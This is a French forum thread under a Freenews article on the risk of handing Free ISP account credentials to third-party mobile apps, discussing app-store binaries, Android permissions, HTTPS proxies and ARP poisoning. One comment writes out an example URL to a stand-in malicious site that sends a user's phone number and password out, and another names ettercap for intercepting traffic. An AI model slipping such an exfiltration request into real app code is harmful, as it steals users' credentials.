[Freenews]

Les identifiants de compte Free sont le sésame permettant d'accéder à une grande variété de services. Configuration du mode routeur de la Freebox, envoi de fax, consultation des factures, commande d'accessoires payants... tout, ou presque, est possible depuis l'interface de gestion. Néanmoins, ils nécessitent une protection maximale contre les utilisateurs mal intentionnés qui pourraient vouloir s'en emparer...

Lire l'intégralité de la news

[Fanfwe]

"Il convient de ne pas céder à la paranoïa (il reste peu probable qu’une application mobile détourne effectivement vos identifiants à l’heure actuelle), d’autant que certains programmes de ce type sont disponibles en open source (ce qui permet de vérifier par soi-même qu’ils ne contiennent aucun bout de code malicieux)."
Sauf que dans le cas de l'iphone, le seul moyen d'installer une appli (hors jailbreak) c'est de prendre le binaire qui se trouve sur l'app store. Or rien ne prouve que ce binaire corresponde effectivement au code source que l'auteur publie.
Si encore on pouvait compiler soi meme son appli et l'installer sur le telephone, alors oui, la on serait tranquille, mais avec un tel modele de deploiement d'applis, rien n'est moins sur...

[ThierryL]

Bon article sur une très bonne question! en tant que dev d'une appli sur Android (non open source - au moins pour l'instant), je me sens d'ailleurs un peu concerné...
3 commentaires:
- open source ou pas, une appli n'est pas à l'abrit d'une grosse vulnérabilité (ex: mot de passe apparaissant dans les logs, téléphone avec droits root sur lequel une autre appli peut récupérer le mot de passe stocké, etc.) et de toute façon comme c'est dit le mdp passe en clair sur le réseau (HTTP), même s'il n'est quand même pas trivial de l'intercepter, sauf dans le cas d'un accès WiFi non chiffré ou sur un PC infecté
- attention aux usines à gaz: si l'authentification est trop complexe, adieu les applis sur iphone, android etc.
- dans tout les cas le meilleurs moyen d'éviter les soucis c'est de renouveller son mot de passe régulièrement. je sais, ça embête tout le monde, mais c'est bien pourtant le moyen le plus efficace de limiter les risques.

Thierry -- FBR

[Yoann Ferret]

"Il convient de ne pas céder à la paranoïa (il reste peu probable qu’une application mobile détourne effectivement vos identifiants à l’heure actuelle), d’autant que certains programmes de ce type sont disponibles en open source (ce qui permet de vérifier par soi-même qu’ils ne contiennent aucun bout de code malicieux)."
Sauf que dans le cas de l'iphone, le seul moyen d'installer une appli (hors jailbreak) c'est de prendre le binaire qui se trouve sur l'app store. Or rien ne prouve que ce binaire corresponde effectivement au code source que l'auteur publie.
Si encore on pouvait compiler soi meme son appli et l'installer sur le telephone, alors oui, la on serait tranquille, mais avec un tel modele de deploiement d'applis, rien n'est moins sur...

Effectivement. Mais le défaut que tu cites ne concerne heureusement que l'iPhone et son (très décrié) système d'application 100% verrouillé. Une preuve supplémentaire, s'il en fallait une, que ce fonctionnement est problématique. Avec les autres systèmes, notamment Android, on peut télécharger le programme directement sur un site comme Sourceforge ou Google Code et ainsi s'assurer qu'il est conforme à sa source...

Comme le pointe ThierryL, ça ne résout pas le problème pour les développeurs qui ne souhaitent pas distribuer leur code source et qui, par conséquent, n'ont pas de moyen pratique de prouver leur bonne foi...

[tmo2]

(ce qui permet de vérifier par soi-même qu’ils ne contiennent aucun bout de code malicieux)."
.

En clair ça veut dire quoi pour le profane. Comment procéder?

[Yoann Ferret]

(ce qui permet de vérifier par soi-même qu’ils ne contiennent aucun bout de code malicieux)."
.

En clair ça veut dire quoi pour le profane. Comment procéder?

Pour le profane ça ne signifie pas grand-chose, vu qu'il serait incapable de comprendre le code source par lui-même.
Mais le simple fait que le code soit publiquement disponible est un bon gage de sécurité pour l'utilisateur lambda, puisqu'il sait ainsi que d'autres utilisateurs plus avancés peuvent observer ce code et, de ce fait, faire savoir publiquement s'il y a des fonctions douteuses à l'intérieur.

Ce serait plutôt kamikaze et stupide de la part du développeur d'insérer du code malicieux dans un programme open source !

[ThierryL]

Comme le pointe ThierryL, ça ne résout pas le problème pour les développeurs qui ne souhaitent pas distribuer leur code source et qui, par conséquent, n'ont pas de moyen pratique de prouver leur bonne foi...

pas tout à fait vrai:
- le modèle de sécurité d'Android est quand même assez restrictif en imposant à chaque application de déclarer les accès sensible qu'elle doit faire (accès internet, utilisation du téléphone, accès au données personnelles, etc.); impossible d'accéder aux préferences des autres applications, etc. On n'est quand même pas sous Windows...
- il est toujours possible de recupérer le binaire (apk) de l'installer sur un émulateur et de vérifier ce qu'il dit qu'il doit faire (e.g. n'envoie pas les mots de passe sur je sais pas quelle site)
- enfin même si on utilise une appli open source, le téléphone n'étant pas complètement maitrisé (sauf réinstall complète depuis les sources d'android et sans les applis google donc), point du vue sécurité, tu es à peine plus avancé.

[ThierryL]

Ce serait plutôt kamikaze et stupide de la part du développeur d'insérer du code malicieux dans un programme open source !

Entièrement d'accord pour le code malicieux. Mais pour les failles de sécurités, le fait que l'appli soit open source ne protège de rien si personne ne relit le code.

[wattoo]

Dans le scénario, je suis visé par une procédure HADOPI, je réponds que mon accès WIFI a été piraté malgré le WPA et une clé bien sentie, je me retourne contre free sur le fait que le portail n'étant pas sécurisé, il est facile en faisant de l'écoute passive dans un réseau d entreprise ou une école, de récupérer les identifiants Free, et donc de récupérer la clé WPA hyper complexe que je me suis embêté à mettre !

On parie que Free va mettre dare dare du HTTPS sur les requêtes d'authentification du portail ?

[ThierryL]

... il est facile en faisant de l'écoute passive dans un réseau d entreprise ou une école ...

pour une entreprise sérieure, l'écoute passive ne devrait pas être si simple pour un employé lambda. En général tu es sur un switch et tu ne peux pas écouter les communications de tes voisins. Bon évidemment, si tu es admin système, ou si les switchs sont accessibles le placard à balai sans clé...

Et même en HTTPS, tu auras quand même le problème si tu es derrière un proxy HTTP: la connection n'est serait pas chiffrée de ton PC au serveur de Free, mais de ton PC au proxy (et encore là je suis pas sûr), puis du proxy au serveur de free. Donc quiconque à accès au proxy (support informatique) pourrait théoriquement accéder à tes mots de passe.

On revient toujours au même point: changer régulièrement ses mots de passe  (valable aussi pour le WPA)

[djcobrax]

Il est important de préciser que SEULES les applications qui se connecteront à votre console de gestion seront susceptibles de vous demander votre mot de passe (à vous de décider si vous faîtes confiance à l'auteur dans ce cas) !
Un jeu ou une application de type p2p par exemple n'a aucun moyen de détourner vos données puisqu'elles ne sont pas accessibles aux développeurs Elixir freebox.

[Eric Reboux]

Sauf que dans le cas de l'iphone, le seul moyen d'installer une appli (hors jailbreak) c'est de prendre le binaire qui se trouve sur l'app store. Or rien ne prouve que ce binaire corresponde effectivement au code source que l'auteur publie.
Si encore on pouvait compiler soi meme son appli et l'installer sur le telephone, alors oui, la on serait tranquille, mais avec un tel modele de deploiement d'applis, rien n'est moins sur...

Parce que tu crois sérieusement qu'Apple n'y a pas pensé ? Puisqu'il y a fourniture du source et de l'exécutable, Apple recompile ton appli et celle-là qui est diffusée.

Parce que sinon rappelles-nous les fois où des malwares ont envahi l'AppStore... Par contre c'est hélas déjà arrivé le sur MarketPlace d'Android, Google ne vérifiant les applications que quand on lui signale un problème.

[Yoann Ferret]

Sauf que dans le cas de l'iphone, le seul moyen d'installer une appli (hors jailbreak) c'est de prendre le binaire qui se trouve sur l'app store. Or rien ne prouve que ce binaire corresponde effectivement au code source que l'auteur publie.
Si encore on pouvait compiler soi meme son appli et l'installer sur le telephone, alors oui, la on serait tranquille, mais avec un tel modele de deploiement d'applis, rien n'est moins sur...

Parce que tu crois sérieusement qu'Apple n'y a pas pensé ? Puisqu'il y a fourniture du source et de l'exécutable, Apple recompile ton appli et celle-là qui est diffusée.

Parce que sinon rappelles-nous les fois où des malwares ont envahi l'AppStore... Par contre c'est hélas déjà arrivé le sur MarketPlace d'Android, Google ne vérifiant les applications que quand on lui signale un problème.

Oui d'accord, mais concrètement, peux-tu m'expliquer en quoi ça change quoi que ce soit à ce qui a été dit ? Apple bloque-t-il les applications qui utiliseraient les identifiants Free à des fins imprévues ? Par quelle magie ?

Ce qu'on dit c'est que le système de l'iPhone ne permet pas de vérifier qu'un logiciel fourni est conforme à une source donnée (hors jailbreak). Ce qui est particulièrement gênant dans le cas qui nous concerne.

[wattoo]

pour une entreprise sérieure, l'écoute passive ne devrait pas être si simple pour un employé lambda. En général tu es sur un switch et tu ne peux pas écouter les communications de tes voisins. Bon évidemment, si tu es admin système, ou si les switchs sont accessibles le placard à balai sans clé...

Je ne pensais pas forcément à un utilisateur et l'utilisation d'un réseau switché n interdit pas l'écoute passive (il y a des techniques qui ne nécessite même pas d'être admin du switch).

Et même en HTTPS, tu auras quand même le problème si tu es derrière un proxy HTTP: la connection n'est serait pas chiffrée de ton PC au serveur de Free, mais de ton PC au proxy (et encore là je suis pas sûr), puis du proxy au serveur de free. Donc quiconque à accès au proxy (support informatique) pourrait théoriquement accéder à tes mots de passe.

en HTTPS la connexion est chiffrée de bout en bout donc le proxy ne voit que du flux chiffré passé.
Bon y a quelques vendeurs de boites qui proposent aujourdhui des proxy qui déchiffrent les flux en s'appuyant sur de vrais faux certificats serveurs notamment pour détecter les petits malin qui utilisent HTTPS pour passer des flux non web (comme SSH)

On revient toujours au même point: changer régulièrement ses mots de passe  (valable aussi pour le WPA)

C est malheureusement une mesure insuffisante pour couvrir le risque et l'objet de ma remarque est bien de montrer que free ne donne pas les moyens au freenaute, même prudent, de protéger efficacement son AP.

D'autres FAI ont contourné ça (notamment Orange) en installant l'interface de paramétrage directement sur la box (mais elle n'est plus accessible d'internet)

[ThierryL]

en HTTPS la connexion est chiffrée de bout en bout donc le proxy ne voit que du flux chiffré passé.
Bon y a quelques vendeurs de boites qui proposent aujourdhui des proxy qui déchiffrent les flux en s'appuyant sur de vrais faux certificats serveurs notamment pour détecter les petits malin qui utilisent HTTPS pour passer des flux non web (comme SSH)

houla non. proxy http = connexion http/ip qui démarre de ton pc jusqu'au proxy et le proxy établi une connexion http/ip vers le serveur web. ce n'est pas différent en HTTPS. si tu as une connexion de bout en bout ce n'est plus un proxy.

[wattoo]

houla non. proxy http = connexion http/ip qui démarre de ton pc jusqu'au proxy et le proxy établi une connexion http/ip vers le serveur web. ce n'est pas différent en HTTPS. si tu as une connexion de bout en bout ce n'est plus un proxy.

Désolé de te contredire mais un proxy se comporte différement en HTTP et en HTTPS
Un proxy HTTP travaille au niveau HTTP c est a dire qu'il interprete le protocole HTTP et à partir de cette interpretation construit une nouvelle requête HTTP qu'il relaie au serveur destination)
Un proxy HTTPS travaille au niveau TCP, c'est à dire qu'une fois que le navigateur lui envoie une commande "CONNECT serveur:port" il se comporte en proxy TCP (c'est à dire qu'il récupère le payload TCP du socket client<->proxy qui est chiffré et le réencapsule dans une autre session proxy<->serveur)
La connexion SSL est donc chiffrée de bout en bout et ton proxy ne voit rien du protocole encapsulé (qui peut être ce qu on veut)

[Mathieu]

Je pense qu'il faut rappeler que ces applications "Free" ne sont pas basées sur une API ou quoi ce que soit de la part de Free et que ce n'est que du bidouillage.
Si Free décidait de publier une API, ils proposeraient certainement une authentification similaire à celle de Twitter ou Facebook.
Dans tous les cas, il faut faire confiance au développeur. Il est de toute façon impossible (pour 99% des utilisateurs) de vérifier quoi que soit. Il est même très facile d'imiter le système d'autorisation de Twitter ...
Si l'application a été télécharger des milliers de fois et que Freenews l'a testé pour vous , c'est certainement bon.
Comme dit plus haut, dans le doute, changer son mot de passe de temps en temps, ça ne coute rien.

[wattoo]

Je pense qu'il faut rappeler que ces applications "Free" ne sont pas basées sur une API ou quoi ce que soit de la part de Free et que ce n'est que du bidouillage.
Si Free décidait de publier une API, ils proposeraient certainement une authentification similaire à celle de Twitter ou Facebook.
Dans tous les cas, il faut faire confiance au développeur. Il est de toute façon impossible (pour 99% des utilisateurs) de vérifier quoi que soit. Il est même très facile d'imiter le système d'autorisation de Twitter ...
Si l'application a été télécharger des milliers de fois et que Freenews l'a testé pour vous , c'est certainement bon.
Comme dit plus haut, dans le doute, changer son mot de passe de temps en temps, ça ne coute rien.

Oui c est de la bidouille et oui il faut faire confiance au développeur de toutes façons, qu'il utilise une bidouille ou une api toute belle et sécurisée.
En effet, s'il utilise correctement l'API mais qu'en parallèle de l'utilisation de cette belle API (basée sur un login/mdp) il fait une petite requete du genre

Code: [Sélectionner]

http://www.monsitedevilaindeveloppeur.com/rec.php?tel=xxxxxxxxxx&pass=xxxxxxxxben t'auras beau faire une authentification sécurisée, changer de mot de passe toutes les semaines, ça changera pas la donne, il récupèrera systématiquement tes identifiants à ton insu. Alors...

[edzilla]

... il est facile en faisant de l'écoute passive dans un réseau d entreprise ou une école ...

pour une entreprise sérieure, l'écoute passive ne devrait pas être si simple pour un employé lambda. En général tu es sur un switch et tu ne peux pas écouter les communications de tes voisins. Bon évidemment, si tu es admin système, ou si les switchs sont accessibles le placard à balai sans clé...

Et même en HTTPS, tu auras quand même le problème si tu es derrière un proxy HTTP: la connection n'est serait pas chiffrée de ton PC au serveur de Free, mais de ton PC au proxy (et encore là je suis pas sûr), puis du proxy au serveur de free. Donc quiconque à accès au proxy (support informatique) pourrait théoriquement accéder à tes mots de passe.

On revient toujours au même point: changer régulièrement ses mots de passe  (valable aussi pour le WPA)

Avec un peu d'arp poisonning (ok, on est plus dans l'écoute passive, mais bon...), tu peux très facilement récupérer tout les mots de passe qui transitent sur le réseau.
Des outils comme ettercap peuvent même éventuellement te permettre d'écouter des connections https. L'utilisateur obtient juste une alerte expliquant que le certif est foireux, n'en tient évidemment pas compte, et c'est parti...

[alex67500]

en HTTPS la connexion est chiffrée de bout en bout donc le proxy ne voit que du flux chiffré passé.
Bon y a quelques vendeurs de boites qui proposent aujourdhui des proxy qui déchiffrent les flux en s'appuyant sur de vrais faux certificats serveurs notamment pour détecter les petits malin qui utilisent HTTPS pour passer des flux non web (comme SSH)

houla non. proxy http = connexion http/ip qui démarre de ton pc jusqu'au proxy et le proxy établi une connexion http/ip vers le serveur web. ce n'est pas différent en HTTPS. si tu as une connexion de bout en bout ce n'est plus un proxy.

Alors...
oui et non.
On peut configurer les proxys des deux facons pour le HTTPS. La premiere revient pour le proxy a ne pas regarder le flux, et a se comporter comme un simple bridge. C'est l'idee du HTTPS : une socket SSL chiffree qui va du navigateur au serveur web cible. Quasi-impossible pour n'importe quel sniffer de voir des donnees en clair, sauf a l'installer directement sur le poste client.

L'autre solution, c'est de "casser" le flux. Mais ca veut dire que vos administrateurs ont mis en place, pour signer des certificats SSL, un certificat SSL racine qui est accepte par tous vos navigateurs en entreprise, sinon ils vont tous vous afficher un avertissement avant de vous laisser continuer (et pour une fois, IE aussi), en vous expliquant que quelqu'un essaye de se faire passer pour un autre.

En fait, les banques ou google sont assez reticents a donner leurs clefs privees -- comprendre : cours toujours. Du coup, meme si c'est legalement discutable[1], un administrateur qui voudrait utiliser un antivirus sur son proxy (c'est quand meme un peu la pour ca, entre autres raisons...) est oblige de voir les donnees en clair a un moment dans l'echange. D'ou la rupture de flux.

[1] "Signer" un certificat SSL "a la volee", c'est se faire passer pour google.com ou unebanquepwouetpwouet.fr alors qu'on ne l'est pas. S'il y a un juriste dans l'assemblee, il pourra peut-etre nous dire ce qu'on encourt pour usurpation d'identite, mais ca doit pas etre agreable...

[ThierryL]

Désolé de te contredire mais un proxy se comporte différement en HTTP et en HTTPS
Un proxy HTTP travaille au niveau HTTP c est a dire qu'il interprete le protocole HTTP et à partir de cette interpretation construit une nouvelle requête HTTP qu'il relaie au serveur destination)
Un proxy HTTPS travaille au niveau TCP, c'est à dire qu'une fois que le navigateur lui envoie une commande "CONNECT serveur:port" il se comporte en proxy TCP (c'est à dire qu'il récupère le payload TCP du socket client<->proxy qui est chiffré et le réencapsule dans une autre session proxy<->serveur)
La connexion SSL est donc chiffrée de bout en bout et ton proxy ne voit rien du protocole encapsulé (qui peut être ce qu on veut)

Ne soit pas désolé, tu as complètement raison, j'ai dit une grosse c******e. Oui les connections sont relayées au niveau TCP et le payload est chiffré de bout en bout et ne peut être lu sans casser le code comme l'a dit alex. J'assume et je mange mon chapeau.

[ThierryL]

Je pense qu'il faut rappeler que ces applications "Free" ne sont pas basées sur une API ou quoi ce que soit de la part de Free et que ce n'est que du bidouillage.
Si Free décidait de publier une API, ils proposeraient certainement une authentification similaire à celle de Twitter ou Facebook.
Dans tous les cas, il faut faire confiance au développeur. Il est de toute façon impossible (pour 99% des utilisateurs) de vérifier quoi que soit. Il est même très facile d'imiter le système d'autorisation de Twitter ...
Si l'application a été télécharger des milliers de fois et que Freenews l'a testé pour vous , c'est certainement bon.
Comme dit plus haut, dans le doute, changer son mot de passe de temps en temps, ça ne coute rien.

Tout à fait d'accord, c'est de la bidouille et plutot inefficace car oblige à charge une page HTML complète, tout ça pour récupérer un petit bout de json dans un coin. Et si demain Free change le layout de ses pages web, plus rien ne marchera. Une API dédiée, compacte (et documentée) serait vraiment un plus pour des téléphones qui n'ont pas une connexion ADSL.

Malheusement en attendant, c'est incontournable et même indispensable puisque certaines page web d'admin de Free ne sont pas supportées par le navigateur Android (au moins sur mon téléphone en 1.5).

[DevDef]

Pour la forme, une petite faute à corriger :
« l’application tierce ne demande ainsi plus les mot de passe »